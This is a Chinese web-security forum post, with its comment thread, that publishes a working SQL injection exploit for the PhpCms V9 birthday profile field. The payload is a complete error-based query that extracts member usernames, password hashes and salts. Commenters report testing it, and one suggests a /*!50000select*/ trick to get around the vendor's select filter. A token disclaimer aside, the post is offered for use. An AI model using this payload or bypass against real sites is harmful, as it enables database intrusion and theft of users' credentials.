PhpCms V9 info[birthday]注入利用

2013-02-04 23:47:02 13 BinAry 3813 1

既然官方已经确认了，那就发一下所谓的EXP吧。权当交流，大家测试即可，请勿用于非法。

注册后登录，找到个人资料，修改生日，拦截数据包或者直接firebug找到info[birthday]，将其修改如下：

info[birthday=(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select concat(username,0x3a, password, 0x3a, encrypt) FROM `v9_member` WHERE 1 limit 1),1,62)))a from information_schema.tables group by a)b)]

即可爆出username+hash+salt 。能不能破解出来就看诸位RP了。

类别 Web安全

关于作者

BinAry48篇文章657篇回复

BinAry

评论13次

要评论？请先登录或注册

13楼

闷豆、
2013-3-12 23:38

回复|@ta|踩(0)|顶(0)
12楼

tbird
2013-3-12 19:58

测试了下, 果然很犀利,不过小弟不才,不知道怎么爆全部管理.

回复|@ta|踩(0)|顶(0)
11楼

1006079161
2013-2-5 23:31

这种注入方式以后看来要多尝试了，

回复|@ta|踩(0)|顶(0)
10楼

guhun
2013-2-5 23:28

测试下，,感谢...........

回复|@ta|踩(0)|顶(0)
9楼

再见江南
2013-2-5 16:53

md5 密码是硬伤！

回复|@ta|踩(0)|顶(0)
8楼

paco
2013-2-5 16:21

谁给个90sec的邀请码呗。。。。。。。。。。我等小辈不胜感激

回复|@ta|踩(0)|顶(0)
7楼

clannad
2013-2-5 12:40

爆出来的账户后台登陆显示不存在，是否是补丁已打的征兆？

回复|@ta|踩(0)|顶(0)
6楼

skyfly
2013-2-5 10:02

先拿去测试下

回复|@ta|踩(0)|顶(0)
5楼

leehenwu
2013-2-5 09:51

哈哈谢谢楼主

回复|@ta|踩(0)|顶(0)
4楼

godblack
2013-2-5 09:47

楼主这代码绕不过对select的过滤的。

回复|@ta|踩(0)|顶(0)
3楼

注册用户
2013-2-5 09:15

。。。很不清楚。。。日期都没检查。。。这代码是如何写的？。。

回复|@ta|踩(0)|顶(0)
2楼

laterain2
2013-2-5 09:13

为什么和90sec的exp不一样，补丁不是过滤了select update这些吗，90里的大牛说使用/*!50000select*/代替select绕过检测

回复|@ta|踩(0)|顶(0)
1楼

孤心
2013-2-5 08:46

感谢楼主，楼主好人，，马上去测试。。

回复|@ta|踩(0)|顶(0)